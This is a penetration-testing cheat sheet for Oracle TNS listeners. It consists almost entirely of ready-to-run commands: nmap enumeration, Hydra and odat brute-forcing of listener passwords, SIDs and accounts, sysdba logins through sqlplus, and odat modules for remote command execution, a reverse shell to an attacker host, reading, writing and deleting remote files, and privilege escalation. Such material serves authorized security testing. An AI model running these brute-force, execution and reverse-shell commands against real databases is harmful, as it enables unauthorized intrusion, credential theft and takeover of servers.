Oracle TNS

Pentesting Oracle TNS - TCP Ports 1521,1522-1529


Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP, -you may also get secondary listeners on 1522–1529-), it starts up a new database process and establishes a connection between the client and the Oracle database.


Enumerate version

Using nmap scripts, we can enumerate the version of the TNS-Listener

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>

Commands & Brute-force

When enumerating Oracle the first step is to talk to the TNS-Listener

# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>

# Dump service data
tnscmd10g services -p 1521 -h <IP>

# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>

# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>

If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected

We can use hydra to brute-force TNS-Listener password

hydra -P rockyou.txt -t 32 -s 1521 <IP> oracle-listener

Targeting SID

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

We can brute-force SID using Hydra or Odat

#Using Hydra
hydra -L sid.txt -s 1521 <IP> oracle-sid

#Using odat
odatPLSEXTPROC sidguesser -s $SERVER -d $SID --sids-file=./sids.txt

# Interesting Wordilists
cat /usr/share/metasploit-framework/data/wordlists/sid.txt
cat /usr/share/nmap/nselib/data/oracle-sids

Targeting Accounts

Once we have found a valid SID, the next step is account enumeration. From this point, you can connect to the listener and brute-force credentials.

We can use Hydra or odat, or nmap to bruteforce accounts on a known SID

odat passwordguesser -s $SERVER -d $SID
odat passwordguesser -s $SERVER -d $SID -p 1521 --accounts-files users.txt pass.txt

hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 $SERVER oracle /$SID

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=$SID $SERVER

Here are mixed wordlists taken from hacktricks and some interesting other wordlists

# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst

# User Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

# User/Password list
cat /usr/share/oscanner/accounts.default 

Logging into a Remote Database

To login using known credentials, we can use sqlplus

sqlplus <username>/<password>@<ip_address>:<port>/<SID>

If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysoper'

Remote Code Execution

If an account has system database priviledges (sysdba) or system operator (sysop) you may add following args when using odat:


We can try to execute code using odat Java Stored Procedure

# Execute commands
odat java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

# Get a reverse shell
odat java -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

Read/Write files

We can try to read/write files using odat and utlfile

#Read file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/RemotePath" remote_file.txt local_file.txt

#Write file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --putFile "C:/RemotePath" remote_file.txt local_file.txt

#Remove file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --removeFile "C:/RemotePath" remote_file.txt

OracleSQL Privilege Escalation

We may use the privesc module from odat to escalate our privileges on the DB. On that link you will find several ways to escalate privileges using odat.

#Get module Help
odat privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h

Automation Tools

An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

#apt install oscanner
oscanner -s <IP> -P <PORT>


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